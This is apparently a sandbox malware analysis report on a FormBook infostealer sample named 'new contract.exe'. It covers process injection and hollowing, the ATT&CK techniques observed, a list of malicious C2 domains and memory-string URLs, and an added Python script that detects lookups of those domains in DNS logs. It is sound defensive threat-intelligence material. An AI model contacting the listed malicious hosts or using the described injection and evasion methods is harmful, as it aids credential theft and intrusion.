Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\new contract.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_00685FE5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter | 5_2_00685FE5
Source: C:\Users\user\Desktop\new contract.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match | File source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match | File source: 2.2.new contract.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.new contract.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.1806364473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4129188271.00000000027A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4129245511.00000000027D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4128918968.0000000000510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1741421854.0000000003F59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 5_2_00684B96 fprintf,GetUdpStatisticsEx,GetIpStatisticsEx,SnmpUtilMemAlloc,fprintf,fprintf,SnmpUtilMemFree,fprintf,fprintf,SnmpUtilMemAlloc,SnmpUtilOidCpy,SnmpUtilVarBindFree,SnmpUtilVarBindFree,SnmpUtilVarBindFree,SnmpUtilVarBindFree,GetIcmpStatisticsEx,GetTcpStatisticsEx | 5_2_00684B96
ATT&CK matrix, one line per tactic column; the number the report shows beside a technique is given in square brackets:

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
Execution: Shared Modules [1]; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell
Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Privilege Escalation: Access Token Manipulation [1]; Process Injection [522]; Abuse Elevation Control Mechanism [1]; DLL Side-Loading [1]; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron
Defense Evasion: Masquerading [1]; Disable or Modify Tools [1]; Virtualization/Sandbox Evasion [41]; Access Token Manipulation [1]; Process Injection [522]; Deobfuscate/Decode Files or Information [1]; Abuse Elevation Control Mechanism [1]; Obfuscated Files or Information [3]; Software Packing [12]; DLL Side-Loading [1]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
Discovery: System Time Discovery [1]; Security Software Discovery [231]; Process Discovery [2]; Virtualization/Sandbox Evasion [41]; Application Window Discovery [1]; System Network Configuration Discovery [1]; System Network Connections Discovery [1]; System Information Discovery [213]; Network Sniffing; Network Service Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
Command and Control: Encrypted Channel [1]; Ingress Tool Transfer [2]; Non-Application Layer Protocol [2]; Application Layer Protocol [12]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
Behavior Graph ID: 1531093 | Sample: new contract.exe | Start date: 10/10/2024 | Architecture: WINDOWS | Score: 100
Start node DNS/IP: www.uickautoquote.net; www.sofaerb.shop; 9 other IPs or domains
Start node signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 10 other signatures
Process tree:
  new contract.exe 3 (started)
    dropped: C:\Users\user\...\new contract.exe.log, ASCII
    signatures: Injects a PE file into a foreign processes
    new contract.exe (started)
      signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; 2 other signatures
      explorer.exe 60 1 (injected)
        DNS/IP: www.igmoto.info 89.31.143.90, 49979, 80 QSC-AG-IPXDE Germany
        signatures: Uses netstat to query active network connections and open ports
        NETSTAT.EXE (started)
          signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements; Switches to a custom stack to bypass stack traces
          cmd.exe 1 (started)
            conhost.exe (started)
        autofmt.exe (started)

Initial sample:

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| new contract.exe | 50% | ReversingLabs | ByteCode-MSIL.Trojan.SnakeLogger | |
| new contract.exe | 100% | Joe Sandbox ML | | |

Dropped files, unpacked PE files and domains: No Antivirus matches (three empty detection tables).

Note that the ReversingLabs label (SnakeLogger) does not match the family this report assigns from its Yara rule and extracted configuration (FormBook); treat the scanner label as a detection, not as the family name.
URLs:

| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | 0% | URL Reputation | safe | |
| https://api.msn.com:443/v1/news/Feed/Windows? | 0% | URL Reputation | safe | |
| http://www.fontbureau.com/designers | 0% | URL Reputation | safe | |
| https://excel.office.com | 0% | URL Reputation | safe | |
| http://www.sajatypeworks.com | 0% | URL Reputation | safe | |
| http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe | |
| http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe | |
| https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | 0% | URL Reputation | safe | |
| http://www.urwpp.deDPlease | 0% | URL Reputation | safe | |
| http://www.zhongyicts.com.cn | 0% | URL Reputation | safe | |
| https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg | 0% | URL Reputation | safe | |
| https://word.office.com | 0% | URL Reputation | safe | |
| https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | 0% | URL Reputation | safe | |
| https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe | |
| http://www.carterandcone.coml | 0% | URL Reputation | safe | |
| http://www.fontbureau.com/designers/frere-user.html | 0% | URL Reputation | safe | |
| https://android.notify.windows.com/iOS | 0% | URL Reputation | safe | |
| http://www.fontbureau.com/designersG | 0% | URL Reputation | safe | |
| http://www.fontbureau.com/designers/? | 0% | URL Reputation | safe | |
| http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe | |
| http://www.fontbureau.com/designers? | 0% | URL Reputation | safe | |
| https://powerpoint.office.comcember | 0% | URL Reputation | safe | |
| http://www.tiro.com | 0% | URL Reputation | safe | |
| http://www.goodfont.co.kr | 0% | URL Reputation | safe | |
| http://schemas.micro | 0% | URL Reputation | safe | |
| http://www.typography.netD | 0% | URL Reputation | safe | |
| http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe | |
| https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe | |
| http://www.fonts.com | 0% | URL Reputation | safe | |
| http://www.sandoll.co.kr | 0% | URL Reputation | safe | |
| http://www.sakkal.com | 0% | URL Reputation | safe | |

Trailing fragments such as cThe, DPlease, coml, designersG or comcember are neighbouring memory bytes picked up by the string scanner, not part of the URL. None of these entries is attacker infrastructure: the font-vendor URLs come from font licence text inside the .NET binary and the msn.com, office.com and windows.com entries from explorer.exe's own memory.
Domains:

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| www.igmoto.info | 89.31.143.90 | true | true | | unknown |
| www.livialiving.online | unknown | unknown | true | | unknown |
| www.arklife.shop | unknown | unknown | true | | unknown |
| www.uickautoquote.net | unknown | unknown | true | | unknown |
| www.sofaerb.shop | unknown | unknown | true | | unknown |
| www.ldkp.net | unknown | unknown | true | | unknown |
| www.innivip.bio | unknown | unknown | true | | unknown |
| www.r64mh1.vip | unknown | unknown | true | | unknown |
| www.olar-systems-panels-61747.bond | unknown | unknown | true | | unknown |
| www.aycare-service-99683.bond | unknown | unknown | true | | unknown |
| www.aser-cap-hair-growth.today | unknown | unknown | true | | unknown |

Of the eleven domains, only www.igmoto.info resolved (89.31.143.90) and received traffic during the analysis; no IP was observed for the other ten, so the lookups themselves are the useful indicator, not a destination address.
Contacted URLs:

| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| www.aycare-service-99683.bond/c89p/ | true | | unknown |
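The domain table above, the contacted URL www.aycare-service-99683.bond/c89p/ and the memory strings that follow all share one URI path, and the string scanner often fuses two adjacent list entries into a single string (http://www.igmoto.info/c89p/www.olar-systems-panels-61747.bond). The script below is an added example for this page, not code from Joe Sandbox or from the sample: it rebuilds the domain IOC set from such strings (splitting fused entries) and runs a detection over resolver logs that flags a client querying several listed domains, the walk-through-the-list behaviour the graph shows for the injected explorer.exe. The domain strings are copied from this report; the DNS log lines, the four-column log format and the threshold of three distinct domains are constructed assumptions.

```python
"""Added example, not part of the Joe Sandbox report: build an IOC set from the
report's C2-candidate strings and scan DNS logs for the behaviour the report
records (the injected explorer.exe querying one listed domain after another,
almost none of which resolve). The domain strings come from the report; the
DNS log lines and the threshold are constructed assumptions."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Every C2 candidate in this report carries the same URI path.
C2_PATH = "/c89p/"

# Domains from the report's domain table (resolved or attempted in the sandbox).
REPORT_DOMAINS = {
    "www.igmoto.info", "www.livialiving.online", "www.arklife.shop",
    "www.uickautoquote.net", "www.sofaerb.shop", "www.ldkp.net",
    "www.innivip.bio", "www.r64mh1.vip", "www.olar-systems-panels-61747.bond",
    "www.aycare-service-99683.bond", "www.aser-cap-hair-growth.today",
}

# Subset of the report's memory-string table. The string scanner fuses two
# adjacent list entries ("http://A/c89p/www.B") and appends junk ("Referer:").
MEMORY_STRINGS = [
    "http://www.oviepicker.net/c89p/www.hinawinner.top",
    "http://www.igmoto.info/c89p/www.olar-systems-panels-61747.bond",
    "http://www.aycare-service-99683.bond/c89p/www.x-design-courses-29670.bond",
    "http://www.innivip.bio/c89p/www.aser-cap-hair-growth.today",
    "http://www.arklife.shop/c89p/www.sofaerb.shop",
    "http://www.arklife.shopReferer:",       # junk suffix, no C2 path: ignored
    "http://www.hinawinner.top",             # bare host, covered by a fused entry
    "http://www.fontbureau.com/designers",   # font licence text in the .NET binary
    "https://excel.office.com",              # explorer.exe's own memory
]

HOST_RE = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+$")


def extract_c2_domains(strings, path=C2_PATH):
    """Hosts that carry the shared C2 path, plus the next list entry when two
    entries were fused. Strings without the path are left alone, which drops
    the benign font/MSN strings and the junk-suffixed ones."""
    hosts = set()
    for s in strings:
        if path not in s:
            continue
        before, after = s.split(path, 1)
        host = urlsplit(before).hostname          # lower-cased by urlsplit
        if host and HOST_RE.match(host):
            hosts.add(host)
        after = after.strip().lower()             # fused next entry, if any
        if HOST_RE.match(after):
            hosts.add(after)
    return hosts


def ioc_domains():
    """Domain table plus whatever the memory strings add (here three more)."""
    return REPORT_DOMAINS | extract_c2_domains(MEMORY_STRINGS)


# Constructed resolver log (assumed format): "<timestamp> <client> <qname> <rcode>".
DNS_LOG = """\
2024-10-10T09:01:02Z 10.0.0.15 www.igmoto.info NOERROR
2024-10-10T09:01:03Z 10.0.0.15 www.livialiving.online NXDOMAIN
2024-10-10T09:01:04Z 10.0.0.15 www.arklife.shop NXDOMAIN
2024-10-10T09:01:05Z 10.0.0.15 www.hinawinner.top NXDOMAIN
2024-10-10T09:01:06Z 10.0.0.42 www.fontbureau.com NOERROR
2024-10-10T09:01:07Z 10.0.0.42 www.sofaerb.shop NXDOMAIN
2024-10-10T09:01:08Z 10.0.0.42 excel.office.com NOERROR
"""


def scan_dns_log(log_text, iocs, threshold=3):
    """Clients that queried at least `threshold` distinct IOC domains.
    One lookup can be noise; walking through the list is the sample's pattern."""
    seen = defaultdict(set)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        _ts, client, qname, _rcode = parts
        qname = qname.lower().rstrip(".")
        if qname in iocs:
            seen[client].add(qname)
    return {c: sorted(d) for c, d in seen.items() if len(d) >= threshold}


if __name__ == "__main__":
    iocs = ioc_domains()
    print(f"{len(iocs)} IOC domains")
    for client, domains in scan_dns_log(DNS_LOG, iocs).items():
        print(client, "queried", len(domains), "listed domains:", ", ".join(domains))
```

The threshold is what keeps this usable: a single lookup of one of these domains (a security scanner, an analyst) is weak evidence, but one host querying several of them within seconds, most of them returning NXDOMAIN, is exactly what the sandbox recorded. Feed it a resolver export in the same four-column shape, or change the split in scan_dns_log to match the log format you actually have.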
URLs from memory strings:

Three source sets recur; they are abbreviated in the table as follows.

- S1 = explorer.exe: 00000003.00000003.3480809766.000000000CB15000.00000004.00000001.00020000.00000000.sdmp; 00000003.00000003.3108387578.000000000CB20000.00000004.00000001.00020000.00000000.sdmp; 00000003.00000003.3483212037.000000000CB20000.00000004.00000001.00020000.00000000.sdmp; 00000003.00000003.3106421132.000000000CB08000.00000004.00000001.00020000.00000000.sdmp; 00000003.00000002.4142645947.000000000CB15000.00000004.00000001.00020000.00000000.sdmp
- S2 = explorer.exe: 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp; 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp
- S3 = new contract.exe: 00000000.00000002.1743231924.0000000007172000.00000004.00000800.00020000.00000000.sdmp

| Name | Source | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|
| https://aka.ms/odirm | explorer.exe: 00000003.00000003.3484154679.00000000079FB000.00000004.00000001.00020000.00000000.sdmp; 00000003.00000000.1745295797.00000000079FB000.00000004.00000001.00020000.00000000.sdmp; 00000003.00000003.3108475652.00000000079FB000.00000004.00000001.00020000.00000000.sdmp; 00000003.00000002.4133315277.00000000079FB000.00000004.00000001.00020000.00000000.sdmp | false | | unknown |
| http://www.oviepicker.net/c89p/ | S1 | false | | unknown |
| http://www.hinawinner.top | S1 | false | | unknown |
| http://www.livialiving.online/c89p/ | S1 | false | | unknown |
| http://www.olar-systems-panels-61747.bond | S1 | false | | unknown |
| https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | S2 | false | URL Reputation: safe | unknown |
| http://www.arklife.shopReferer: | S1 | false | | unknown |
| http://www.igmoto.info/c89p/www.olar-systems-panels-61747.bond | S1 | false | | unknown |
| https://api.msn.com:443/v1/news/Feed/Windows? | explorer.exe: 00000003.00000000.1745295797.0000000007900000.00000004.00000001.00020000.00000000.sdmp; 00000003.00000000.1752045440.00000000097D4000.00000004.00000001.00020000.00000000.sdmp; 00000003.00000003.3108632093.00000000097D4000.00000004.00000001.00020000.00000000.sdmp; 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp; 00000003.00000002.4137734556.00000000097D4000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://www.aycare-service-99683.bond/c89p/ | S1 | false | | unknown |
| http://www.aycare-service-99683.bond/c89p/www.x-design-courses-29670.bond | S1 | false | | unknown |
| http://www.aser-cap-hair-growth.today/c89p/ | S1 | false | | unknown |
| http://www.livialiving.online | S1 | false | | unknown |
| http://www.fontbureau.com/designers | S3 | false | URL Reputation: safe | unknown |
| http://www.aycare-service-99683.bond | S1 | false | | unknown |
| https://excel.office.com | explorer.exe: 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp; 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we | S2 | false | | unknown |
| https://simpleflying.com/how-do-you-become-an-air-traffic-controller/ | S2 | false | | unknown |
| http://www.sajatypeworks.com | S3 | false | URL Reputation: safe | unknown |
| http://www.founder.com.cn/cn/cThe | S3 | false | URL Reputation: safe | unknown |
| http://www.torehousestudio.info | S1 | false | | unknown |
| http://www.igmoto.info/c89p/ | S1 | false | | unknown |
| http://www.ldkp.net | S1 | false | | unknown |
| http://www.oviepicker.net/c89p/www.hinawinner.top | S1 | false | | unknown |
| https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY | S2 | false | | unknown |
| http://www.r64mh1.vipReferer: | S1 | false | | unknown |
| https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark | explorer.exe: 00000003.00000000.1745295797.00000000078AD000.00000004.00000001.00020000.00000000.sdmp; 00000003.00000002.4133315277.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | false | | unknown |
| http://www.sakkal.com8W | new contract.exe: 00000000.00000002.1743134989.0000000005904000.00000004.00000020.00020000.00000000.sdmp | false | | unknown |
| http://www.arklife.shop/c89p/www.sofaerb.shop | S1 | false | | unknown |
| http://www.galapagosdesign.com/DPlease | S3 | false | URL Reputation: safe | unknown |
| http://www.uickautoquote.net/c89p/ | S1 | false | | unknown |
| https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | explorer.exe: 00000003.00000002.4141038919.000000000C893000.00000004.00000001.00020000.00000000.sdmp; 00000003.00000000.1762772794.000000000C893000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://www.urwpp.deDPlease | S3 | false | URL Reputation: safe | unknown |
| http://www.x-design-courses-29670.bond/c89p/ | S1 | false | | unknown |
| http://www.zhongyicts.com.cn | S3 | false | URL Reputation: safe | unknown |
| https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg | explorer.exe: 00000003.00000002.4133315277.0000000007900000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://www.autoitscript.com/autoit3/J | explorer.exe: 00000003.00000000.1745295797.00000000079B1000.00000004.00000001.00020000.00000000.sdmp; 00000003.00000003.3108475652.00000000079B5000.00000004.00000001.00020000.00000000.sdmp | false | | unknown |
| https://wns.windows.com/L | explorer.exe: 00000003.00000000.1762772794.000000000C557000.00000004.00000001.00020000.00000000.sdmp; 00000003.00000002.4141038919.000000000C557000.00000004.00000001.00020000.00000000.sdmp | false | | unknown |
| http://www.innivip.bio/c89p/ | S1 | false | | unknown |
| https://word.office.com | explorer.exe: 00000003.00000000.1762772794.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp; 00000003.00000002.4141038919.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown |
| http://www.plesacv.xyz | S1 | false | | unknown |
